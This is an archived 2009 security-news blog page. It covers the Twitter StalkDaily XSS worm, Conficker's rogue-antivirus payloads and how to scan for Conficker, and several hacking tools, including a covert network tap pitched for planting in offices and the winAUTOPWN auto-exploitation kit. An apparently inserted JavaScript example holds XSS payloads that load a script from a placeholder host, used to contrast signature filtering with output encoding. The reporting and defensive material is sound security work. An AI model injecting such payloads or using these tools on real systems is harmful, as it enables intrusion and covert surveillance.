Archive | April, 2009

Twitter Battered By Powerful Worm Attacks



We’ve written about Twitter quite a few times now, with its click-jacking vulnerability, Twitter phishing attacks and various other issues.

It’s no surprise it’s being targeted though as it’s now the 3rd biggest social network after Facebook and Myspace.

Within a relatively short time period it’s overtaken almost everyone else. This weekend it suffered a fairly serious worm infection that spread itself through injecting JavaScript into people’s profile pages. After visiting an ‘infected’ profile you would then be infected and spread the worm from your profile page.

Twitter was hit over the weekend by powerful, self-replicating attacks that caused people to flood the micro-blogging site with tens of thousands of messages simply by viewing booby trapped user profiles.

The worm attacks began early Saturday morning and were the result of XSS, or cross-site scripting, bugs in the Twitter service. They caused those who viewed the profiles of infected users to post tweets promoting a site called StalkDaily.com. Victim profiles were then altered to include malicious javascript that infected new marks. Over the next 36 hours, at least three similar worms made the rounds, causing Twitter administrators to delete more than 10,000 tweets.

Twitter’s inability to quickly contain the mess prompted some security watchers to criticize Twitter for not being more on top of it. According to this postmortem from the Dcortesi blog, the attacks exploited gaping holes that allowed users to insert tags in the URLs of Twitter users’ profile pages that called malicious javascript from third-party web servers.

It’s not the first time Twitter has been hit and it’s not the first time they have been criticized for not being fast enough or for dealing with the problem properly.

The issue itself is quite a serious one and shouldn’t have existed in the first place. Who knows how long this flaw has been known about and what nefarious purposes other people have been using it for.

The fella that exploited it basically did it to promote his own Twitter knock off called StalkDaily which is currently down.

As is frequently the case with XSS-based attacks, the worm was unable to prey on those using the NoScript add-on for the Firefox browser.

Twitter’s security team was able to block the attack for a while, but a new assault that made use of “mildly obfuscated” code soon defeated the countermeasure, raising the possibility that it was based on the detection of attack signatures rather than fixing the underlying bug that allowed the XSS vulnerability in the first place.

“The existence of a mildly obfuscated version authorizes a scary suspect: have Twitter guys just been trying to block the original strain by signature, rather than fixing their website error?” Italian researcher and NoScript creator Giorgio Maone wrote here. “This would be ridiculous, since any script kiddie can create his own slightly modified version for fun or profit (and is probably doing that).”

It’s not the first time Twitter has been slow to react to vulnerabilities on its site that allow self-replicating attacks against its users. The San Francisco-based company took more than 24 hours to close a separate hole discovered by white-hat hackers last month, while many of the company’s employees attended the South by South West conference in Austin, Texas.

The scary part is, Twitter didn’t fix the root cause of the problem – it appears they just filtered out the malicious code. So by altering it slightly the author quickly unleashed another version of the worm.

I hope Twitter gets their act together and starts fixing things properly.
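The difference between blocking a strain by signature and fixing the underlying bug, as an added example that is not from the original post or from Twitter's code: the profile URL field, the sample inputs and all function names are constructed assumptions. A literal-signature filter stops the first sample and misses a case-changed variant, while encoding on output neutralises both.

```javascript
// Added example: signature blocking vs. output encoding for a profile URL field.
// All inputs are constructed; worm.invalid is a reserved, non-resolving name.
const SAMPLES = {
  benign: 'http://example.com/~alice',
  original: 'http://example.com/"><script src="//worm.invalid/x.js"></script><a href="',
  variant: 'http://example.com/"><ScRiPt src="//worm.invalid/x.js"></ScRiPt><a href="',
};

// Countermeasure 1 (what the article suspects): reject input containing the
// exact string seen in the first strain. Returns true when input is allowed.
const KNOWN_SIGNATURE = '<script src="//worm.invalid/x.js">';
function signatureFilter(value) {
  return !value.includes(KNOWN_SIGNATURE);
}

// The underlying bug: the stored value is concatenated into markup unencoded.
function renderNaive(url) {
  return `<a href="${url}">${url}</a>`;
}

// Countermeasure 2 (root-cause fix): encode on output for the HTML context...
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => (
    { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]
  ));
}

// ...and accept only http(s) URLs, since the value lands in an href attribute.
function safeProfileUrl(raw) {
  try {
    const u = new URL(raw);
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : null;
  } catch {
    return null; // not a parseable absolute URL
  }
}

function renderEncoded(raw) {
  const url = safeProfileUrl(raw);
  if (url === null) return '';
  const e = escapeHtml(url);
  return `<a href="${e}" rel="nofollow">${e}</a>`;
}

// Demo helper: list the element names a parser would open, minus the one
// <a> element the template itself is supposed to emit.
function injectedTags(html) {
  const names = [...html.matchAll(/<([a-z][a-z0-9]*)/gi)].map((m) => m[1].toLowerCase());
  const i = names.indexOf('a');
  if (i !== -1) names.splice(i, 1);
  return names;
}

// One row per sample: does the filter let it through, and what does each
// rendering path end up injecting into the page?
function report() {
  return Object.entries(SAMPLES).map(([name, value]) => ({
    name,
    passesSignatureFilter: signatureFilter(value),
    naiveInjected: injectedTags(renderNaive(value)),
    encodedInjected: injectedTags(renderEncoded(value)),
  }));
}

console.log(JSON.stringify(report(), null, 2));
```
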

Source: The Register


Posted in: Exploits/Vulnerabilities, Web Hacking



Watcher – Passive Analysis Tool For HTTP Web Applications



Watcher is a run time passive-analysis tool for HTTP-based Web applications. Watcher provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads, cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.

Major Features:

  1. Passive detection of security, privacy, and PCI compliance issues in HTTP, HTML, Javascript, and CSS
  2. Works seamlessly with complex Web 2.0 applications while you drive the Web browser
  3. Non-intrusive, will not raise alarms or damage production sites
  4. Real-time analysis and reporting – findings are reported as they’re found, exportable to XML
  5. Configurable domains with wildcard support
  6. Extensible framework for adding new checks

Watcher is built as a plugin for the Fiddler HTTP debugging proxy available at www.fiddlertool.com. Watcher works seamlessly with today’s complex Web 2.0 applications by running silently in the background while you drive your browser and interact with the Web-application.

Watcher is built in C# as a small framework with 30+ checks already included. It’s built so that new checks can be easily created to perform custom audits specific to your organizational policies, or to perform more general-purpose security assessments.

You can download Watcher here:

Watcher.zip

Or read more here.


Posted in: Hacking Tools, Web Hacking



Conficker Finally Awakes & Dumps Payload



So it seems something big was brewing with Conficker, they just didn’t want to do what everyone expected and unleash it on April 1st when all eyes were on them.

Smart move really, they kept quiet and waited a week or so after before dropping some fairly serious and complex payloads (encrypted rootkits).

It seems like they are going for the old ransom tactic and duping users into buying dodgy anti-virus software.

An updated version of the Conficker worm is installing malware that attempts to lure people into buying rogue anti-virus software. Security researchers also say the worm is downloading malware tied to the notorious Waledac botnet.

Conficker’s latest move may be tied to a scheme to lure users into downloading fake anti-virus software.

Security researchers monitoring the Conficker worm’s activities say the malware has been observed downloading a file detected by Kaspersky Lab as FraudTool.Win32.SpywareProtect2009.s.

“Once it’s run, you see the app interface, which naturally asks if you want to remove the threats it’s ‘detected,'” wrote Aleks Gostev on Kaspersky Lab’s Analyst’s Diary blog. “Of course, this service comes at a price—$49.95.”

There are also some links to Waledac, a supposed next-gen botnet for spamming purposes that came shortly after the demise of Storm.

It seems like Conficker is not going to be laying dormant any more, perhaps they weren’t making enough from renting out sections to spammers and DDoSers – now they really want to monetize the infected machines they have gathered.

In addition to that file, the worm is also now downloading the Waledac malware, which steals passwords and turns computers into bots for spamming operations. Waledac has emerged as a key part of spamming operations over the past several months, and is widely considered a reincarnation of the infamous Storm botnet.

“Fear is used, universally, as a means to control people,” said Sendio CTO Tal Golan. “Governments use it. Large businesses use it. So it should come as no surprise to anyone that ‘cyber-bad guys’ use it.”

At the moment, the rogue anti-virus software comes from sites located in the Ukraine (131-3.elaninet.com.78.26.179.107) although the worm is downloading it from other sites, according to Kaspersky Lab.

Unsurprisingly the source for much of the rogue software is in Eastern Europe, a hotspot for cybercrime and hackers skilled in malware and cryptography.

There are some updates from F-Secure here:

New Conficker action

Source: eWeek


Posted in: Exploits/Vulnerabilities, General Hacking, Malware



Interceptor – Wireless Wired Network Tap (Fon+)



The Interceptor is a wireless wired network tap. Basically, a network tap is a way to listen in to network traffic as it flows past. Most tools are designed to pass a copy of the traffic onto a specified wired interface which is then plugged into a machine to allow a user to monitor the traffic. The problem with this is that you have to be able to route the data from that wired port to your monitoring machine either through a direct cable or through an existing network. The direct cable method means your monitor has to be nearby the location you want to tap; the network routing means you have to somehow encapsulate the data to get it across the network without it being affected en route.

The Interceptor does away with the wired monitor port and instead spits out the traffic over wireless meaning the listener can be anywhere they can make a wireless connection to the device. As the data is encrypted (actually, double encrypted, see how it works) the person placing the tap doesn’t have to worry about unauthorized users seeing the traffic.

Requirements

This project has been built and tested on a Fon+ but should in theory work on any device which will run OpenWrt and has at least a pair of wired interfaces and a wireless one.

This isn’t intended to be a permanent, in-situ device. It is designed for short term trouble shooting or information gathering on low usage networks, as such, it will work well between a printer and a switch but not between a switch and a router. Here are some possible situations for use:

  • Penetration testing – If you can gain physical access to a target’s office, drop the device between the office printer and switch then sit in the carpark and collect a copy of all documents printed. Or, get an appointment to see a boss and when he leaves the room to get you a drink, drop it on his computer. The relative low cost of the Fon+ means the device can almost be considered disposable and if branded with the right stickers most users wouldn’t think about an extra small box on the network.
  • Troubleshooting – For sys-admins who want to monitor an area of network from the comfort of their desks, just put it in place and fire up your wireless.
  • IDS – If you want to see what traffic is being generated from a PC without interfering with the PC simply add the Interceptor and sit back and watch. As the traffic is cloned to a virtual interface on your monitoring machine you can use any existing tools to scan the data.

You can download Interceptor here:

interceptor_1.0.tar.bz2

Or read more here.


Posted in: Hacking Tools, Network Hacking



Microsoft Puts Hold on Forefront Security Product Range



Microsoft is in the news again, but this time for holding back on something security related.

It seems like they want to have some extra time for development, and well perhaps some business related factors come into play too.

A lot of Windows networks use ISA (as it used to be called) – in the future it’ll be known as Threat Management Gateway. It shows they are moving away from plain old “Firewall” kind of software and more into security intelligence.

Microsoft will delay the release of the next version of its Forefront security product range.

The company’s announcement of the delay suggests it wants to improve the technology, but business reasons provide a more plausible – though unproven – rationale for the postponement.

Instead of shipping the product release, codenamed Stirling, in the first half of 2009, Redmond now expects to put it out around the turn of the year or even later.

Forefront Server Security for Exchange (messaging security) and Threat Management Gateway (the next version of what used to be called ISAS, Microsoft’s enterprise firewall and caching software) are now expected to arrive in Q4 2009.

Management console and Forefront Security for SharePoint (portal security) are penciled in for arrival only in the first half of 2010. Forefront Client Security 2.0 (endpoint security – anti-malware and firewall – for corporate PCs) has also been delayed till the first half of next year.

It seems like the whole suite has been put on hold for quite some time, with most products looking to come out Q4 2009 or more likely everything will hit the streets in Q1-2 2010.

I don’t have much experience with any of these as I stopped using Microsoft products in a corporate environment quite some time back.

Anyone have any thoughts?

In a posting on the Forefront security blog, Microsoft said the delay was needed to add improved behaviour-based anti-malware protection and to improve integration with third-party security applications. The security giant expects to ship a second beta of Stirling and a release candidate prior to the final release.

Microsoft said its behaviour-based anti-malware protection, which it calls Dynamic Signature Service, will help “deliver more comprehensive endpoint protection for zero day attacks” by complementing existing “advanced heuristics, dynamic translation and real time application scanning for kernel level malware with a sophisticated approach to on-demand threat mitigation”.

We’re not exactly sure what that means either.

Our guess is that Microsoft is actually pushing back the enterprise security release to coincide with the availability of Windows 7 and changes to how it supplies security software to consumers. Back in November, Microsoft announced plans to discontinue its Windows Live OneCare consumer security service from the end of June in favour of a free consumer product, codenamed Morro, currently under development.

They are claiming to be developing technology that can detect 0-day exploits; well, that’s how it reads to me. Unless they can beat the heuristic engines that most modern anti-virus software uses (unsuccessfully I might add) they are going to be out of luck.

It could just be a move to synchronise the development with the release of the much-awaited Windows 7. Let’s hope for everyone’s sake it’s an altogether more secure product.

Source: The Register


Posted in: Countermeasures, Security Software



Webtunnel 0.0.5 Released – HTTP Encapsulation and Tunnel Tool



Webtunnel is a network utility that encapsulates arbitrary data in HTTP and transmits it through a web server.

In that regard, it is similar to httptunnel, however, it has several key important differences: its server component runs in the context of a web server as a CGI application (with optional FastCGI support) so it does not need its own port, and supports most things that the web server supports, such as authentication, HTTP 1.1, HTTPS, and client certificates; it uses simple requests and responses so it works seamlessly through forward and reverse proxies; it is multi-threaded (actually multi-process using sockets for inter-process communication) to allow multiple parallel connections to multiple destinations simultaneously.

What’s New?

  • Added support for proxy auto-configuration
  • Fixed a bug that would cause a keep-alive timeout to stop the tunnel
  • Fixed a fork handling bug to support ActivePerl’s negative PIDs

You can download Webtunnel 0.0.5 here:

webtunnel-0.0.5.tgz

Or read more here.


Posted in: Hacking Tools, Network Hacking



How to Scan for Conficker Worm



A bit of an update on the Conficker worm, which is supposedly scheduled to receive new updates and instructions today, Wednesday 1st April 2009; nobody except the bad guys knows what those instructions will be. Fyodor has rolled out a new Nmap beta release whose Nmap Scripting Engine can check whether a particular machine is possibly infected by the Conficker worm.

Thanks to excellent research by Tillmann Werner and Felix Leder of The Honeynet Project and implementation work by Ron Bowes, David Fifield, Brandon Enright, and Fyodor, we’ve rolled out a new Nmap release which can remotely scan for and detect infected machines. Nmap 4.85BETA5 is now available from the download page, including official binaries for Windows and Mac OS X. To scan for Conficker, use a command such as:


A clean machine should report at the bottom: “Conficker: Likely CLEAN”, while likely infected machines say: “Conficker: Likely INFECTED”.

A useful feature for checking whether any of the computers on your own network are infected by the Conficker worm.

Tenable Security have also released a new Nessus plugin, #36036, which performs a network-based check for Windows computers infected with a variant of the Conficker virus. The scan does not need credentials, but does require ports 445 or 139 to be open between the Nessus scanner and your scanned systems. The plugin is based on research from the University of Bonn in Germany.

Conficker exploits Windows systems vulnerable to MS08-067. Tenable has worked with many organizations to help them perform both un-credentialed network scans and credentialed patch audits with Nessus to find systems that are still vulnerable.

Source: insecure.org and tenablesecurity.com.


Posted in: Countermeasures, Malware



UCSniff – VoIP/IP Video Sniffing Tool



UCSniff is an exciting new VoIP Security Assessment tool that leverages existing open source software into several useful features, allowing VoIP owners and security professionals to rapidly test for the threat of unauthorized VoIP and Video Eavesdropping. Written in C, and initially released for Linux systems, the software is freely available for anyone to download, under the GPLv3 license. Some useful features of UCSniff that have been combined together into a single package:

  • Allows targeting of VoIP Users based on Corporate Directory and/or extensions
  • Support for automatically recording private IP video conversations
  • Automatically re-creates and saves entire voice conversations to a single file that can be played back by media players
  • Support for G.722 and G.711 u-law compression codecs
  • Support for H.264 Video codec
  • Automated VLAN Hop and Discovery support
  • A UC Sniffer (VoIP and Video) combined with a MitM re-direction tool
  • Monitor Mode
  • Sniffs entire conversation if only one phone is in source VLAN

UCSniff was created as a Proof of Concept demonstration tool and a method of creating awareness around VoIP/UC threats. It can be used by VoIP/UC Administrators to test their own VoIP Infrastructure in a pilot before vulnerabilities are rolled into production. It can also be used by security professionals as a method of convincing IT decision makers that security best practices should be applied to VoIP/UC in the same way that they are applied to other TCP/IP based, client-server applications.

You can download UCSniff here:

ucsniff-2.00.tar.gz

Or read more here.


Posted in: Hacking Tools, Network Hacking, Privacy



Conficker Day – April 1st – Uneventful



So the big Conficker scare of April 1st has passed without any real events, no major sites taken down, no major online terror campaigns spawned.

Just a new more sophisticated, harder to stop version of Conficker updating from a longer list of domains.

It seems like this malware might be here to stay, infecting more and more computers and building a formidable network of zombies.

April 1 has come and gone in some parts of the world, and the Conficker worm is still here. While the day in security passed by relatively uneventfully, there are still people at risk.

The doomsday some were predicting the Conficker worm to bring had not materialized as of the evening of April 1. But that hardly means Conficker is a bust.

In short, the Conficker worm did what was expected—generate 50,000 domain names and begin contacting them. According to BKIS, the Bach Khoa Internetwork Security center, 1.1 million PCs in Europe, Asia and a part of America infected with Conficker have already “called home.”

But even though nothing dramatic happened, AVG Technologies Chief Research Officer Roger Thompson warned against blowing the worm off.

It seems like the confirmed infection rate is sitting at just above 1 million, far less than the previously estimated 9 million.

But still 1 million is a formidable arsenal of spam sending machines, or a deadly DDoS network.

There is also the possibility of selling Conficker’s army of infected computers, but that could prove problematic due to the amount of attention it generated. Right now, countless members of the security community, including the Conficker Cabal—formally known as the Conficker Working Group—are keeping tabs on the worm. Even with 50,000 domains in question, those domains are being closely monitored and any malicious servers will likely be noticed before long.

“Given the profile of Conficker, I think it’s rather unlikely that the botnet is up for sale,” said Roel Schouwenberg, senior anti-virus researcher at Kaspersky Lab Americas. “Not a lot of people out there would like to handle such hot property, as the botnet is being watched by a lot of people. However, leasing [parts of] the botnet is a different story. That way the leasers would get the advantage of the power of the botnet, but the owners would still be running the risk.”

I think the assumption is fine, they won’t plan on selling the botnet – they will just keep increasing its size and potential and then lease out chunks of it for DDoS attacks and sending spam e-mails.

All this dodgy stuff is big business now, and sadly there doesn’t seem to be anything we can do about it.

Of course we can personally make sure no-one we know gets infected with Conficker, and if they do we can clean it up. But other than that, just observe the fun right?

Source: eWeek


Posted in: General News, Malware



winAUTOPWN – Windows Autohacking Tool



winAUTOPWN is a TooL to Autohack your targets with least possible interaction. The aim of creating winAUTOPWN is not to compete with already existing commercial frameworks like Core Impact (Pro), Immunity Canvas, Metasploit Framework (freeware), etc. which offer autohacks, but to create a free, quick, standalone application which is easy to use and doesn’t require a lot of support of other dependencies.

Also not forgetting that winAUTOPWN unlike other frameworks maintains the original exploit writer’s source code intact just as it was and uses it. This way the exploit writer’s credit and originality is maintained. The source is modified only when required to enable a missing feature or to remove hard-coded limitations. Under these circumstances also, the exploit writers credits remain intact.

Newer exploit modules are added as and when they release and older ones are also being daily added.
Binaries of perl, php, python and cygwin DLLs (included) are required to exist either in a common folder or should be properly installed with their paths registered for those exploits which cannot be compiled into a PE-exe.

Features :

  • Contains already custom-compiled executables of famous and effective exploits along with a few original modified exploits.
  • No need to debug, script or compile the source codes.
  • Scans all ports 1 – 65535 after taking the IP address and tries all possible exploits according to the list of discovered open ports (OpenPorts.TXT)
  • PortScan is multi-threaded.
  • Doesn’t require any Database like (PostGres,MySQL,etc.) at the back-end
  • Can also be used to test effectiveness of IDS/IPS
  • Launched exploits are independent and don’t rely on service fingerprinting (to avoid evasion, if any)
  • Requires presence of php, perl and python with registered paths in Environment variables.

winAUTOPWN is updated almost daily. A separate DragonflyBSD-server is being set up which will hold the exploit repository and the next version will autosync the exploits from them in the appropriate folder.

You can download winAUTOPWN here:

winAUTOPWN.RAR

Or read more here.


Posted in: Exploits/Vulnerabilities, Hacking Tools, Windows Hacking
